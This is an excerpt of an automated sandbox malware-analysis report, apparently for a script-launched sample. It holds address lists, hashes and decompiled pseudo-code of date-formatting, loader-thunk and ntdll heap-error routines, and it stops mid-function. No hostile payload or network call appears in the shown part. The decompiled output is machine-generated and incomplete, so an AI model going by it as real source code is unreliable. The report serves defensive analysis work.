0x02721e37
0x02721e41
0x02721e48
0x02721e48
0x02721e53
0x02721d78
0x02721d78
0x00000000
0x02721d78
0x02721d72
0x02721d5c
0x02721d60
0x02721d60
0x02721d5a
0x02721d4f
0x02721cac
0x02721cac
0x02721cb2
0x02721cb7
0x02721cf4
0x02721cf5
0x02721cfb
0x02721d02
0x02721d07
0x02721d09
0x02721d0b
0x02721d11
0x02721d13
0x02721d13
0x02721d1a
0x02721d1f
0x02721d23
0x02721d28
0x02721d2d
0x02721d2d
0x02721d32
0x02721cb9
0x02721cc2
0x02721cc8
0x02721ccc
0x02721cd1
0x02721cd3
0x02721cdd
0x02721ce4
0x00000000
0x02721ce9
0x02721ced
0x02721cc6
0x02721cc6
0x02721cc6
0x02721cc2
0x02721cb7

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ca3ada1f9aff4f4b26c17e82de7faea6cb54c2450a34e580a74632cc09279f
Instruction ID: ff3f0fcccdcfd0fd65aa8cb692ab88debc7c5e75fb0914c4b826489027e25575
Opcode Fuzzy Hash: 59ca3ada1f9aff4f4b26c17e82de7faea6cb54c2450a34e580a74632cc09279f
Instruction Fuzzy Hash: 0CA107667116240BD719EA7D9C843ADB3C2FBC4325F98827EE52DCB383EB64C9498750

Uniqueness

Uniqueness Score: -1.00%

Function 02729718 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79
threadCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E02729718(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				intOrPtr _v284;
				char* _t34;
				intOrPtr* _t50;
				intOrPtr _t59;
				void* _t64;
				intOrPtr _t66;
				void* _t70;

				_v8 = 0;
				_t50 = __edx;
				_t64 = __eax;
				_push(_t70);
				_push(0x2729806);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xfffffee8;
				E027248A0(__edx);
				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
				if(_t64 > 2) {
					E02724938( &_v8, 0x2729828);
				} else {
					E02724938( &_v8, 0x272981c);
				}
				_t34 = E02724D64(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
					E02724B10(_t50, 0x100,  &_v280);
					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
						_v284 =  *_t50;
						_t66 = _v284;
						if(_t66 != 0) {
							_t66 =  *((intOrPtr*)(_t66 - 4));
						}
						E02724DC4( *_t50, _t66 - 1, 2, _t50);
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(E0272980D);
				return E027248A0( &_v8);
			}

0x02729725
0x02729728
0x0272972a
0x0272972e
0x0272972f
0x02729734
0x02729737
0x0272973c
0x02729748
0x02729753
0x0272975e
0x02729765
0x0272977e
0x02729767
0x0272976f
0x0272976f
0x02729792
0x027297ab
0x027297ba
0x027297c0
0x027297cb
0x027297d1
0x027297d9
0x027297de
0x027297de
0x027297eb
0x027297eb
0x027297c0
0x027297f2
0x027297f5
0x027297f8
0x02729805

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02729806), ref: 0272979E
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02729806), ref: 027297A4

Strings

yyyy, xrefs: 02729779

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 51d1654f05d017378d83ce4d28337aa9fb888f48013ea7142427b4859abfd341
Instruction ID: fbebaa1699816cd7b5703eff1bfa2b4316cb222bcdc5514ca3b082a278e9fbac
Opcode Fuzzy Hash: 51d1654f05d017378d83ce4d28337aa9fb888f48013ea7142427b4859abfd341
Instruction Fuzzy Hash: 81219175A00278DFDB11DF58C895AAEB3F9EF08700F5504A5EA45E7340E7309E48CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wscript.exePID: 5988, Parent PID: 6024COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	42.9%
Total number of Nodes:	1256
Total number of Limit Nodes:	25

Executed Functions

Function 059895D0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 059895DA

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0314672c205545122c6d36e904080b8abdb68fafd3fd286ae54bb998ed023740
Instruction ID: faf3df7b52085a28afd98a9d87f8f816496e4004d70f6b5460040883d2752379
Opcode Fuzzy Hash: 0314672c205545122c6d36e904080b8abdb68fafd3fd286ae54bb998ed023740
Instruction Fuzzy Hash: 9A9002A1202200034509715D4594616405A97F0241B91C021E1004590DD5658C9171B5

Uniqueness

Uniqueness Score: -1.00%

Function 05989780 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0598978A

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 111895d114219c8e3f97b735775c66e21ccdcdce31205b5fc8b430d8d8d127a1
Instruction ID: c5ba4107849852d61f073b4aa0962b92ea182f5346c93ed4a8e39ea9642b0a57
Opcode Fuzzy Hash: 111895d114219c8e3f97b735775c66e21ccdcdce31205b5fc8b430d8d8d127a1
Instruction Fuzzy Hash: 3D90026921320002D584715D558860A005597E1242FD1D415A0005558CD9558C6963B1

Uniqueness

Uniqueness Score: -1.00%

Function 05989FE0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05989FEA

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21e0ef3b773330a59e8ccf852a5b93ebaf352b85be6932189b4ebc1451401547
Instruction ID: cf427c6a9493d0d185500b7c5573dcb76fb95ee36a1d2da6435ede9c7296df80
Opcode Fuzzy Hash: 21e0ef3b773330a59e8ccf852a5b93ebaf352b85be6932189b4ebc1451401547
Instruction Fuzzy Hash: 4890027131134402D514615D8584706005597E1241F91C411A0814558D96D58C9171B2

Uniqueness

Uniqueness Score: -1.00%

Function 059896E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 059896EA

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36a46328772caecdde1e6ef3d1fb137a16626a33025820638ffdafa1f22713ba
Instruction ID: 1169d795232cd265bf4bfae6cc5500c5a2222637404c510a4d468c85ef17d328
Opcode Fuzzy Hash: 36a46328772caecdde1e6ef3d1fb137a16626a33025820638ffdafa1f22713ba
Instruction Fuzzy Hash: 3390027120128802D514615D858474A005597E0341F95C411A4414658D96D58C9171B1

Uniqueness

Uniqueness Score: -1.00%

Function 05989660 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0598966A

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 673e56dfc0cf71cd461677544a3866a77a7502b3b33fd6f33e01ba6c59d433ee
Instruction ID: f7e48c3054ae038976a3c3223e7c2b609a8b07556c8505c9f89eb69cd404031e
Opcode Fuzzy Hash: 673e56dfc0cf71cd461677544a3866a77a7502b3b33fd6f33e01ba6c59d433ee
Instruction Fuzzy Hash: 0090027120120802D584715D458464A005597E1341FD1C015A0015654DDA558E5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 059899A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 059899AA

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ba1e7e8fd54e09c0d637fe7913966f29a9bca18ce6708889056d473682bf8d8
Instruction ID: e5bf7c7e6d9d7a302a29899e48b3f91a4ace58aebee0297e4bd8de0713c5d0e7
Opcode Fuzzy Hash: 6ba1e7e8fd54e09c0d637fe7913966f29a9bca18ce6708889056d473682bf8d8
Instruction Fuzzy Hash: 149002A134120442D504615D4594B060055D7F1341F91C015E1054554D9659CC5271B6

Uniqueness

Uniqueness Score: -1.00%

Function 05989910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0598991A

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 029e156833179707011a62822fb62ec64d163f93b3d9ce39cbfed48be043c509
Instruction ID: 6b93b0f3213512f5f75188b0b64b80cc4e0b777e8ff2d0197886787deb6f8ed5
Opcode Fuzzy Hash: 029e156833179707011a62822fb62ec64d163f93b3d9ce39cbfed48be043c509
Instruction Fuzzy Hash: 3D9002B120120402D544715D4584746005597E0341F91C011A5054554E96998DD576F5

Uniqueness

Uniqueness Score: -1.00%

Function 05989860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0598986A

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f09e6800369ad7a06e5069a6c9b44f8433beebd964a99f0c09cca231329a734
Instruction ID: 67a99fc2fc2c0c8a31bd01c22d68223b5f396bcfe343c3c01c7000c0e76e8a0c
Opcode Fuzzy Hash: 9f09e6800369ad7a06e5069a6c9b44f8433beebd964a99f0c09cca231329a734
Instruction Fuzzy Hash: 2390027120120413D515615D4684707005997E0281FD1C412A0414558DA6968D52B1B1

Uniqueness

Uniqueness Score: -1.00%

Function 0598967A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05989694

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c2f7ee6c428a1a2675c6506f56707d0ec7f06aef244775bf5bf67d72088e8bdf
Instruction ID: 618d3e715db2e211cc853ea91d1a5519b1c56906a649897420795656e6513727
Opcode Fuzzy Hash: c2f7ee6c428a1a2675c6506f56707d0ec7f06aef244775bf5bf67d72088e8bdf
Instruction Fuzzy Hash: C9B092B29026C5CAEA15E7A44B48B3B7A55BBE0745F66C062E2020681A4778C491F6F6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 059FB260 Relevance: 37.8, Strings: 30, Instructions: 262
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

The instruction at %p tried to %s , xrefs: 059FB4B6
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 059FB39B
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 059FB314
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 059FB476
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 059FB47D
*** then kb to get the faulting stack, xrefs: 059FB51C
This failed because of error %Ix., xrefs: 059FB446
write to, xrefs: 059FB4A6
The resource is owned shared by %d threads, xrefs: 059FB37E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 059FB3D6
a NULL pointer, xrefs: 059FB4E0
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 059FB323
*** Resource timeout (%p) in %ws:%s, xrefs: 059FB352
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 059FB484
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 059FB53F
*** enter .exr %p for the exception record, xrefs: 059FB4F1
The resource is owned exclusively by thread %p, xrefs: 059FB374
*** A stack buffer overrun occurred in %ws:%s, xrefs: 059FB2F3
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 059FB305
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 059FB2DC
*** An Access Violation occurred in %ws:%s, xrefs: 059FB48F
The critical section is owned by thread %p., xrefs: 059FB3B9
read from, xrefs: 059FB4AD, 059FB4B2
Go determine why that thread has not released the critical section., xrefs: 059FB3C5
The instruction at %p referenced memory at %p., xrefs: 059FB432
<unknown>, xrefs: 059FB27E, 059FB2D1, 059FB350, 059FB399, 059FB417, 059FB48E
*** enter .cxr %p for the context, xrefs: 059FB50D
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 059FB38F
an invalid address, %p, xrefs: 059FB4CF
*** Inpage error in %ws:%s, xrefs: 059FB418

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 8973c706c875b2271d1edd80d856b770a06924de36bfca81fadeb8117e1cc086
Instruction ID: d01a30237108d3fbcff0d4d38f094d2810c7a892609a76d998965a1b70074d71
Opcode Fuzzy Hash: 8973c706c875b2271d1edd80d856b770a06924de36bfca81fadeb8117e1cc086
Instruction Fuzzy Hash: B581E175B41210FFDB21AF05CC9AE7B3B2BEF86A92F454044F6042B112D3B59511DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05A01C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E05A01C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x59248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0594B150();
				} else {
					E0594B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x5a3589c);
				E0594B150("Heap error detected at %p (heap handle %p)\n",  *0x5a358a0);
				_t27 =  *0x5a35898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05A01E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0594B150();
				} else {
					E0594B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0594B150("Error code: %d - %s\n",  *0x5a35898);
				_t113 =  *0x5a358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0594B150();
					} else {
						E0594B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0594B150("Parameter1: %p\n",  *0x5a358a4);
				}
				_t115 =  *0x5a358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0594B150();
					} else {
						E0594B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0594B150("Parameter2: %p\n",  *0x5a358a8);
				}
				_t117 =  *0x5a358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0594B150();
					} else {
						E0594B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0594B150("Parameter3: %p\n",  *0x5a358ac);
				}
				_t119 =  *0x5a358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0594B150();
					} else {
						E0594B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x5a358b4);
					E0594B150("Last known valid blocks: before - %p, after - %p\n",  *0x5a358b0);
				} else {
					_t120 =  *0x5a358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0594B150();
				} else {
					E0594B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0594B150("Stack trace available at %p\n", 0x5a358c0);
			}

0x05a01c10
0x05a01c16
0x05a01c1e
0x05a01c3d
0x05a01c3e
0x05a01c20
0x05a01c35
0x05a01c3a
0x05a01c44
0x05a01c55
0x05a01c5a
0x05a01c65
0x05a01c67
0x00000000
0x05a01c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05a01c67
0x05a01cdc
0x05a01ce5
0x05a01d04
0x05a01d05
0x05a01ce7
0x05a01cfc
0x05a01d01
0x05a01d0b
0x05a01d17
0x05a01d1f
0x05a01d25
0x05a01d30
0x05a01d4f
0x05a01d50
0x05a01d32
0x05a01d47
0x05a01d4c
0x05a01d61
0x05a01d67
0x05a01d68
0x05a01d6e
0x05a01d79
0x05a01d98
0x05a01d99
0x05a01d7b
0x05a01d90
0x05a01d95
0x05a01daa
0x05a01db0
0x05a01db1
0x05a01db7
0x05a01dc2
0x05a01de1
0x05a01de2
0x05a01dc4
0x05a01dd9
0x05a01dde
0x05a01df3
0x05a01df9
0x05a01dfa
0x05a01e00
0x05a01e0a
0x05a01e13
0x05a01e32
0x05a01e33
0x05a01e15
0x05a01e2a
0x05a01e2f
0x05a01e39
0x05a01e4a
0x05a01e02
0x05a01e02
0x05a01e08
0x00000000
0x00000000
0x05a01e08
0x05a01e5b
0x05a01e7a
0x05a01e7b
0x05a01e5d
0x05a01e72
0x05a01e77
0x05a01e95

Strings

heap_failure_entry_corruption, xrefs: 05A01C83
heap_failure_buffer_underrun, xrefs: 05A01C9F
heap_failure_invalid_argument, xrefs: 05A01CAD
heap_failure_invalid_allocation_type, xrefs: 05A01CB4
heap_failure_cross_heap_operation, xrefs: 05A01CC2
heap_failure_virtual_block_corruption, xrefs: 05A01C91
heap_failure_unknown, xrefs: 05A01C75
Heap error detected at %p (heap handle %p), xrefs: 05A01C50
HEAP: , xrefs: 05A01C16, 05A01C3D, 05A01D04, 05A01D4F, 05A01D98, 05A01DE1, 05A01E32, 05A01E7A
Last known valid blocks: before - %p, after - %p, xrefs: 05A01E45
Parameter1: %p, xrefs: 05A01D5C
Stack trace available at %p, xrefs: 05A01E86
heap_failure_listentry_corruption, xrefs: 05A01CD0
Error code: %d - %s, xrefs: 05A01D12
Parameter3: %p, xrefs: 05A01DEE
heap_failure_usage_after_free, xrefs: 05A01CBB
heap_failure_lfh_bitmap_mismatch, xrefs: 05A01CD7
heap_failure_freelists_corruption, xrefs: 05A01CC9
heap_failure_block_not_busy, xrefs: 05A01CA6
heap_failure_internal, xrefs: 05A01C6E
Parameter2: %p, xrefs: 05A01DA5
HEAP[%wZ]: , xrefs: 05A01C30, 05A01CF7, 05A01D42, 05A01D8B, 05A01DD4, 05A01E25, 05A01E6D
heap_failure_buffer_overrun, xrefs: 05A01C98
heap_failure_generic, xrefs: 05A01C7C
heap_failure_multiple_entries_corruption, xrefs: 05A01C8A

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: ad4a87b6094ecf87cfcbff727fa39001d52815253da129d1bb1aa93c68a36c39
Instruction ID: a972553651499df7c12333c1d515c17238bd6a7796644646f2be3ff1f8bc0bc8
Opcode Fuzzy Hash: ad4a87b6094ecf87cfcbff727fa39001d52815253da129d1bb1aa93c68a36c39
Instruction Fuzzy Hash: 4D61E532A34644DFCB15DF58ED8AE7577FAEB48B30709902AF40A5B680DA34EC41DE19

Uniqueness

Uniqueness Score: -1.00%

Function 05953D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E05953D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
